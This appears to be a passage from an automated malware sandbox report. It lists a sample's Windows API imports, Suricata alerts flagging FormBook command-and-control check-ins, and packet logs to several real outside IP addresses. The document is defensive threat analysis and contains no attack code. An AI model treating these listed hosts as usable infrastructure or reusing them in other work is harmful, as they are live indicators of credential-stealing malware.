                                                            KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                            USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                            GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                            ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                            OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishGreat Britain

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-11-24T08:13:48.549892+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049853172.104.82.7480TCP
                                                            2024-11-24T08:14:09.110171+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104990431.31.196.17780TCP
                                                            2024-11-24T08:14:24.686321+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104994313.248.169.4880TCP
                                                            2024-11-24T08:14:39.454457+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104998013.248.169.4880TCP
                                                            2024-11-24T08:14:55.212395+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049990107.167.84.4280TCP
                                                            2024-11-24T08:15:10.273169+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049994209.74.77.10880TCP
                                                            2024-11-24T08:15:24.991140+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049998104.21.44.1680TCP
                                                            2024-11-24T08:15:39.670779+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.105000213.248.169.4880TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 24, 2024 08:13:45.841423035 CET4985380192.168.2.10172.104.82.74
                                                            Nov 24, 2024 08:13:45.960928917 CET8049853172.104.82.74192.168.2.10
                                                            Nov 24, 2024 08:13:45.961076975 CET4985380192.168.2.10172.104.82.74
                                                            Nov 24, 2024 08:13:45.982008934 CET4985380192.168.2.10172.104.82.74
                                                            Nov 24, 2024 08:13:46.101444006 CET8049853172.104.82.74192.168.2.10
                                                            Nov 24, 2024 08:13:48.541435957 CET8049853172.104.82.74192.168.2.10
                                                            Nov 24, 2024 08:13:48.549774885 CET8049853172.104.82.74192.168.2.10
                                                            Nov 24, 2024 08:13:48.549871922 CET8049853172.104.82.74192.168.2.10
                                                            Nov 24, 2024 08:13:48.549891949 CET4985380192.168.2.10172.104.82.74
                                                            Nov 24, 2024 08:13:48.549926043 CET4985380192.168.2.10172.104.82.74
                                                            Nov 24, 2024 08:13:48.553462982 CET4985380192.168.2.10172.104.82.74
                                                            Nov 24, 2024 08:13:48.672986984 CET8049853172.104.82.74192.168.2.10
                                                            Nov 24, 2024 08:13:59.646157980 CET4988480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:13:59.766020060 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:13:59.766254902 CET4988480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:13:59.781732082 CET4988480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:13:59.901319027 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:01.222702980 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:01.222762108 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:01.222786903 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:01.222867966 CET4988480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:01.223011017 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:01.223087072 CET4988480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:01.223114967 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:01.223134995 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:01.223176003 CET4988480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:01.223221064 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:01.223293066 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:01.223310947 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:01.223344088 CET4988480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:01.223397017 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:01.223438978 CET4988480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:01.292671919 CET4988480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:01.342478991 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:01.342550993 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:01.342578888 CET4988480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:01.342613935 CET4988480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:01.346699953 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:01.346765041 CET4988480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:01.346841097 CET804988431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:01.346923113 CET4988480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:02.311769962 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:02.432163000 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:02.432302952 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:02.448090076 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:02.567608118 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:03.838325024 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:03.838402033 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:03.838454008 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:03.838490009 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:03.838502884 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:03.838521957 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:03.838543892 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:03.838562012 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:03.838598013 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:03.838624954 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:03.838633060 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:03.838668108 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:03.838680029 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:03.838705063 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:03.838743925 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:03.958226919 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:03.958323002 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:03.958421946 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:03.962402105 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:03.962475061 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:03.962524891 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:03.964477062 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.039417028 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.039463997 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.039537907 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.039585114 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.043528080 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.043590069 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.043627024 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.043678045 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.051841021 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.051919937 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.054929972 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.054987907 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.055044889 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.055099964 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.063365936 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.063427925 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.063457012 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.063505888 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.071819067 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.071856022 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.071885109 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.071922064 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.080125093 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.080183983 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.080214024 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.080261946 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.088551044 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.088622093 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.088627100 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.088674068 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.096993923 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.097053051 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.097086906 CET804989031.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:04.097135067 CET4989080192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:04.983694077 CET4989780192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:05.103449106 CET804989731.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:05.103579998 CET4989780192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:05.118554115 CET4989780192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:05.239289999 CET804989731.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:05.239603043 CET804989731.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:06.620698929 CET4989780192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:06.686919928 CET804989731.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:06.686948061 CET804989731.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:06.686960936 CET804989731.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:06.686980009 CET4989780192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:06.687017918 CET4989780192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:06.687017918 CET4989780192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:06.687227964 CET804989731.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:06.687252045 CET804989731.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:06.687263012 CET4989780192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:06.687263966 CET804989731.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:06.687284946 CET4989780192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:06.687303066 CET4989780192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:06.687391043 CET804989731.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:06.687405109 CET804989731.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:06.687432051 CET804989731.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:06.687433004 CET4989780192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:06.687447071 CET4989780192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:06.687460899 CET4989780192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:06.687710047 CET804989731.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:06.687743902 CET4989780192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:06.780818939 CET804989731.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:06.780921936 CET4989780192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:07.639875889 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:07.759361029 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:07.759507895 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:07.769908905 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:07.889484882 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.109932899 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.109970093 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.109989882 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.110146046 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.110171080 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.110198975 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.110204935 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.110213041 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.110250950 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.110460997 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.110474110 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.110486031 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.110502958 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.110893011 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.110934973 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.229722023 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.229811907 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.229959965 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.233867884 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.233927011 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.234020948 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.301805973 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.301898003 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.302182913 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.305959940 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.306068897 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.306221008 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.314347982 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.317409039 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.317490101 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.317502975 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.325800896 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.325856924 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.325937986 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.334146023 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.334245920 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.334260941 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.342566967 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.342679977 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.342804909 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.351217985 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.351290941 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.351339102 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.359272003 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.359280109 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.359539986 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.367702961 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.367754936 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.367831945 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.376061916 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.376133919 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.376158953 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.383945942 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.384006023 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.384047985 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.433152914 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.493618965 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.493678093 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.493926048 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.497857094 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.497864008 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.497885942 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.498013973 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.501646996 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.501703024 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.501756907 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.506407022 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.506481886 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.506494999 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.511189938 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.511326075 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.511353970 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.515963078 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.516042948 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.516199112 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.520708084 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.520802021 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.520804882 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.525501966 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.525571108 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.525588989 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.530301094 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.530363083 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.530500889 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.535058022 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.535118103 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.535145044 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.539901972 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.540011883 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.540047884 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.544631004 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.544708014 CET4990480192.168.2.1031.31.196.177
                                                            Nov 24, 2024 08:14:09.544732094 CET804990431.31.196.177192.168.2.10
                                                            Nov 24, 2024 08:14:09.549343109 CET804990431.31.196.177192.168.2.10
